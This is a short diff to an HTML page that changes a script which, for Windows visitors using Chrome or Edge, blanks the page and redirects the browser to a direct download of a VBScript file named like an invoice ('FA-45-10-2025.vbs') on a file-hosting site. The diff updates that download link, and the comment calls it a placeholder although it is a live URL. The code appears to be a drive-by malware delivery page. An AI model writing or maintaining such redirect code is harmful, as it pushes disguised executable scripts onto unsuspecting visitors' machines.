--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store-eu-par-3.gofile.io/download/direct/e69b9432-d2ac-410f-a83e-6c91d41b7a3a/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store4.gofile.io/download/direct/5a8e47c0-c8c1-4bc9-a9f8-cebe75107f17/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
